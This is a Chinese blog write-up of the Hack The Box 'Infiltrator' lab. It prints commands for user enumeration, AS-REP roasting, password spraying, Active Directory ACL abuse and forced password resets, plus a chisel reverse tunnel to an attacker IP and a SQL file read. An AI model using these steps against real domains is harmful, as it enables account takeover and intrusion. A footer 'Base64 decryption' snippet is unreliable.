Hack The Box-Infiltrator

已于 2024-09-04 11:01:34 修改
阅读量2.3k 收藏 18
点赞数 30
分类专栏: HTB靶场合集 文章标签: hack the box windows KDC SQL chisel BloodHound
于 2024-09-03 15:57:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52742680/article/details/141807831
版权

总体思路

SMB爆破->GetNPUsers->BloodHound信息收集->sql文件泄露->sql命令读取(非预期)

信息收集&端口利用

nmap -sSVC infiltrator.htb

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-02 09:17 CST
Nmap scan report for infiltrator.htb
Host is up (0.61s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Infiltrator.htb
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-02 01:19:04Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
|_ssl-date: 2024-09-02T01:20:40+00:00; -3s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
|_ssl-date: 2024-09-02T01:20:38+00:00; -2s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-02T01:20:40+00:00; -3s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-02T01:20:38+00:00; -2s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-02T01:20:39+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=dc01.infiltrator.htb
| Not valid before: 2024-07-30T13:20:17
|_Not valid after:  2025-01-29T13:20:17
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-09-02T01:20:07
|_  start_date: N/A
|_clock-skew: mean: -2s, deviation: 0s, median: -3s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

开放了挺多端口,并且存在域为dc01.infiltrator.htb,先看80端口信息

在这里插入图片描述

在这里插入图片描述

看了一会,发现没有什么特别的信息

在这里插入图片描述

有一个邮件交流入口,但是应该和以前的机器一样,利用不了,装样子罢

在这里插入图片描述

回到端口处,靶机还开放了139,445端口,可能存在SMB漏洞,详见以下链接

https://book.hacktricks.xyz/v/cn/network-services-pentesting/pentesting-smb

先用enum4linux探测是否存在信息泄露

enum4linux -a infiltrator.htb

在这里插入图片描述

都没有权限

SMB爆破

回到网页,发现网站中有一些用户名,思考这些是否能够用来SMB爆破

在这里插入图片描述

在源码中发现一共有7个用户名

在这里插入图片描述

将其全部提取出来

在这里插入图片描述

使用这些用户名爆破SMB

./kerbrute userenum -d "infiltrator.htb" username.txt --dc "dc01.infiltrator.htb"

在这里插入图片描述

但是均失败

在这里插入图片描述

回到网页,看到此处的信息,猜测是否是因为用户名格式不对

根据外国名字缩写规则和邮箱格式,重新生成一段字典

在这里插入图片描述

再次进行破解尝试

在这里插入图片描述

GetNPUsers

能够爆破出存在的用户名,再使用GetNPUsers筛选出所有不需要”Kerberos预身份验证”的用户

impacket-GetNPUsers infiltrator.htb/ -usersfile newname.txt -outputfile outputusers.txt -dc-ip dc01.infiltrator.htb -no-pass

在这里插入图片描述

能够获取到l.clark用户的hash值,此hash值对应的模式为18200,使用hashcat爆破

在这里插入图片描述

使用获取到的用户密码再跑一次enum4linux,顺便来一次密码喷洒

在这里插入图片描述

在这里插入图片描述

还是获取不到啥信息

密码喷洒

crackmapexec smb [ip] -u tname.txt -p [passwd]

在这里插入图片描述

发现d.anderson用户的密码也是这个密码

BloodHound信息收集

使用bloodhound收集域内信息

bloodhound-python -c ALL -u l.clark -p '[password]' -d dc01.infiltrator.htb -ns [ip]
bloodhound-python -c ALL -u d.anderson -p '[password]' -d dc01.infiltrator.htb -ns [ip]

在这里插入图片描述

使用bloodhound分析

在这里插入图片描述

通过攻击链能够得到一条攻击路径为:D.ANDERSON->MARKETING DIGITAL->E.RODRIGUEZ->CHIEFS MARKETING->M.HARRIS->DC01

接下来需要一步步的操作

D.ANDERSON->MARKETING DIGITAL

在此攻击链路中,D.ANDERSON对MARKETING DIGITAL具有GenericAll权限,在前面我们知道,该用户不能够直接登录,账户权限受到控制,因此这一步旨在提升d.anderson用户的权限。先获取该用户的TGT,然后再使用该TGT以及GenericAll权限,赋予d.anderson对marketing digital的完全控制权

#获取d.andersonTGT
impacket-getTGT infiltrator.htb/d.anderson:'[password]' -dc-ip dc01.infiltrator.htb
#使用dacledit修改ACL使得d.anderson具有完全控制权
export KRB5CCNAME=d.anderson.ccache
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip [ip]
#没有dacledit的可以从https://github.com/ThePorgs/impacket.git下载并配置

在这里插入图片描述

MARKETING DIGITAL->E.RODRIGUEZ

因为e.rodriguez用户包含在marketing digital组中,而d.anderson对其具有完全控制权,可以直接修改其密码

注意,由于密码策略,此处需要执行完上一步后快速执行,不然会报错

#使用d.anderson的权限和bloodAD修改e.rodriguez密码
python3 /root/Dekstop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip [ip] -u "d.anderson" -p "[password]" set password "e.rodriguez" "[newpass]"

在这里插入图片描述

E.RODRIGUEZ->CHIEFS MARKETING

在上一步,我们已经修改了e.rodriguez的密码,在关系图中,可以看到接下去要将该用户添加到chiefs marketing组当中

#获取e.rodriguez的TGT
impacket-getTGT infiltrator.htb/"e.rodriguez":"[newpass]" -dc-ip dc01.infiltrator.htb
#利用addself权限添加
KRB5CCNAME=e.rodriguez.ccache
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --dc-ip [ip] -u e.rodriguez -k add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" e.rodriguez

在这里插入图片描述

CHIEFS MARKETING->M.HARRIS

infiltrator\m.harris

将e.rodriguez添加进chiefs marketing后,可以看到chiefs marketing组能够强制修改m.harris的密码,意味着我们也可以通过e.rodriguez身份强制修改m.harris的密码

#使用e.rodriguez身份,在chiefs marketing组中修改m.harris的密码
KRB5CCNAME=e.rodriguez.ccache
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip 10.129.204.10 -u "e.rodriguez" -p "B3rry11\!" set password "m.harris" "B3rry22"

在这里插入图片描述

此处证书认证已经出现了问题,应该是密钥过期了,需要重新快速的运行一遍,那么重新整理一遍思路

#获取d.andersonTGT
impacket-getTGT infiltrator.htb/d.anderson:'[password]' -dc-ip dc01.infiltrator.htb
#使用dacledit修改ACL使得d.anderson具有完全控制权
export KRB5CCNAME=d.anderson.ccache
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip [ip]
#使用d.anderson的权限和bloodAD修改e.rodriguez密码
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip [ip] -u "d.anderson" -p "[password]" set password "e.rodriguez" "[newpass]"
#获取e.rodriguez的TGT
impacket-getTGT infiltrator.htb/"e.rodriguez":"[newpass]" -dc-ip dc01.infiltrator.htb
#利用addself权限添加
KRB5CCNAME=e.rodriguez.ccache
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --dc-ip [ip] -u e.rodriguez -k add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" e.rodriguez
#使用e.rodriguez身份,在chiefs marketing组中修改m.harris的密码
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip [ip] -u "e.rodriguez" -p "B3rry11\!" set password "m.harris" "B3rry22"

将其编写为一个sh文件,执行之

运行完成后,提示密码已经修改成功,尝试导出证书,使用evil-winrm登录

在这里插入图片描述

在这里插入图片描述

提示无法定位INFILTRATOR.HTB的KDC,这里需要修改本机的/etc/krb5.conf配置文件

[libdefaults]
    default_realm = INFILTRATOR.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false
    forwardable = true
[realms]
    INFILTRATOR.HTB = {
        kdc = dc01.infiltrator.htb
        admin_server = dc01.infiltrator.htb
    }
[domain_realm]
    .infiltrator.htb = INFILTRATOR.HTB
    infiltrator.htb = INFILTRATOR.HTB

在这里插入图片描述

登录进用户后,可以使用msf获取一个新的shell

上传winpeas查看漏洞情况

在这里插入图片描述

发现了一个Output Messenger Server组件的my.ini文件,尝试去访问该文件,但是提示没有权限

在这里插入图片描述

sql文件泄露

继续寻找敏感信息,发现在ProgramData目录下存在Output Messenger和Output Messenger Server文件夹

Output Messenger没有内容,但是Output Messenger Server文件夹内存在一个sql.zip文件

在这里插入图片描述

将其下载下来查看内容

在这里插入图片描述

有一段sql的配置文件,指明了端口和用户名密码

使用chisel将数据库端口代理到本地

#kali
chisel server -p 6150 --reverse
#target
.\chisel.exe client 10.10.16.5:6150 R:14406:127.0.0.1:14406

进入数据库查看

在这里插入图片描述

sql命令读取(非预期)

执行sql语句读取root.txt

SELECT LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt');

在这里插入图片描述

Str4w_AShiR
关注
  • 30
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
sdwan-infiltrator:NSE脚本可自动发现SD-WAN节点
02-05
sdwan-infiltrator:NSE脚本可自动发现SD-WAN节点
BurpSuite手册-046-Burp Infiltrator.pdf
12-28
Burp Suite 常用功能 Burp 包含许多支持测试过程的套件范围的功能。 • Message editor • Inspector • Burp's browser • Sending requests between tools • Search • Learn • Target analyzer • Content discovery • Task scheduler • CSRF PoC generator • Compare site maps • Burp Infiltrator • Burp Clickbandit • Burp Collaborator client • URL matching rules • Response extraction rules • Manual testing simulator • Options
使用 Burp Infiltrator 进行漏洞挖掘
weixin_33827731的博客
09-14 697
本文讲的是使用 Burp Infiltrator 进行漏洞挖掘,在本文中,我将演示如何使用Burp Infiltrator来找到JetBrains公司产品TeamCity的通用型0day,TeamCity是Java编写的一款针对专业开发人员和构建工程师的持续集成(CI)服务器。在这一过程中Burp Infiltrator通过测试目标应用程序,注入代码来跟...
Infiltrator.jl 使用教程
gitblog_01115的博客
08-23 230
Infiltrator.jl 使用教程 Infiltrator.jlNo-overhead breakpoints in Julia项目地址:https://gitcode.com/gh_mirrors/in/Infiltrator.jl 项目介绍 Infiltrator.jl 是一个用于 Julia 编程语言的调试工具,它允许开发者在代码执行过程中设置断点,并在运行时检查变量的状态和值。这个工...
Infiltrator.jl 开源项目教程
gitblog_01159的博客
08-23 271
Infiltrator.jl 开源项目教程 Infiltrator.jlNo-overhead breakpoints in Julia项目地址:https://gitcode.com/gh_mirrors/in/Infiltrator.jl 一、项目目录结构及介绍 Infiltrator.jl 是一个专为 Julia 语言设计的调试辅助工具,旨在提供深入的内存检查和分析能力。以下是其基本的目录...
臭显-NIKE,AIR ZOOM INFILTRATOR
cnmuke
12-07 273
 NIKE,AIR ZOOM INFILTRATOR 趁现在年轻,败一双。。   
Zabbix SAML SSO 登录绕过漏洞(CVE-2022-23131)
热门推荐
江左盟的博客
02-25 1万+
产品简介 Zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。zabbix由2部分构成,zabbix server与可选组件zabbix agent。zabbix server可以通过SNMP,zabbix agent,ping,端口监视等方法提供对远程服务器/网络状态的监视,数据收集等功能,它可以运行在Linux,Solaris,HP-UX,AI
Burp Suite documentation - contents
子曰小玖的博客
04-25 625
Burp Suite documentation Documentation Desktop editions Getting started Launching Burp Startup wizard Selecting a project ...
CVE-2022-40684 Fortinet(飞塔)身份验证绕过漏洞
江左盟的博客
10-31 5352
FortiSwitchManager产品的管理界面中,可以通过使用备用路径或通道绕过身份验证,并在未经认证的情况下通过特制的HTTP或HTTPS请求对管理界面进行操作。
4493 - Sith Infiltrator.mpd
06-10
4493 - Sith Infiltrator.mpd
Infiltrator.jl
05-15
渗透器 该软件包提供了一个名为@infiltrate的宏,该宏在本地上下文中设置了一个“断点”(类似于Matlab的keyboard功能和IPython的embed )。 与例如Debugger.jl相比,此宏的优势在于所有代码均已完全编译,因此性能...
infiltrator:自主渗透无线网络
05-08
指示 1.生成离线地图 在系统上安装mobac (Mobile Atlas Creator),然后按照。 完成此操作后,请继续此处。 2.整合离线地图 使用以下结构创建map/<name>/meta.json文件,同时将其替换为正确的值。...
Java中各种数据结构如何使用stream流
a486368464的博客
09-07 591
Stream允许你以声明方式处理数据集合(包括数组、集合等)
C++——list常见函数的使用和模拟实现(2)
最新发布
Wangx_wang的博客
09-10 468
C++list模拟实现 迭代器部分
生成树详细配置(STP、RSTP、MSTP)
可惜已不在
09-10 1181
通过上述实验得出的结论STP不足:状态多,反应时间长,网络出现问题需要等待很长时间RSTP不足:流量无法负载分担 二层次优路径MSTP优点:可以快速收敛,提供了数据多个路径,实现了VLAN间数据的负载均衡。
【数据结构】单链表的应用
2302_81312180的博客
09-07 432
给你一个链表的头节点head和一个整数val,请你删除链表中所有满足的节点,并返回。思路: 创建新链表,找值不为val的节点,尾插到新链表中。给你单链表的头节点head,请你反转链表,并返回反转后的链表。 给你单链表的头结点head,请你找出并返回链表的中间结点。 如果有两个中间结点,则返回第二个中间结点。
org.apache.poi进行数据的导出
m0_57310426的博客
09-10 391
/获取所用的表格列名(表头名)//获取所用的字段名。
Java泛型类型解析
阿呆的专栏
09-07 916
是针对类的字段,返回字段的泛型类型或具体类型。是针对类或接口,返回定义在类或接口上的类型参数。如果你想获取一个类中字段的实际类型,是合适的方法。如果你想获取类本身定义的类型参数,是正确的方法。表示的是已经用实际类型参数化的泛型类型。例如,是一个。表示的是泛型类型参数本身。例如,T在中是一个。表示完整的参数化类型,而表示泛型类型参数。第一种方式直接通过获取类型,类型信息在运行时已经被擦除,无法获取到实际的泛型类型。最终得到的Type t只是一个原始的类型,没有泛型信息。第二种方式在。
AAECAZoFKNAFhAeMBtIGngXIBrwFzgnmBpIJpgnSBrYH5gaSCaYJ0ga2B4IGugm2B9AF/gOIBPQIiAnQBb4GiAngA8wI8ge2B+oDvga2B6gFmgjyB+IJAAA=解密
04-02
# 解密算法:Base64 # 解密结果:AAECAZoFKNAFhAeMBtIGngXIBrwFzgnmBpIJpgnSBrYH5gaSCaYJ0ga2B4IGugm2B9AF/gOIBPQIiAnQBb4GiAngA8wI8ge2BoDvga2B6gFmgjyBIJAAA= { "deck": "Secret Rogue", "format": "Standard", "player_class": "Rogue", "card_list": [ "Backstab", "Preparation", "Secret Passage", "Shadowstep", "Sinister Strike", "Worgen Infiltrator", "Ashtongue Slayer", "Eviscerate", "Pharaoh Cat", "Plagiarize", "Secretkeeper", "Spymistress", "Dirty Tricks", "Efficient Octo-bot", "Foxtrot", "Greyheart Sage", "Hanar, the Hanar", "Hooked Scimitar", "Jandice Barov", "Sap", "Self-Sharpening Sword", "Shade of Naxxramas", "SI:7 Agent", "Vanish", "Akama", "Doctor Krastinov", "Questing Adventurer", "Scabbs Cutterbutter", "The Coin", "Vendetta" ] }
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值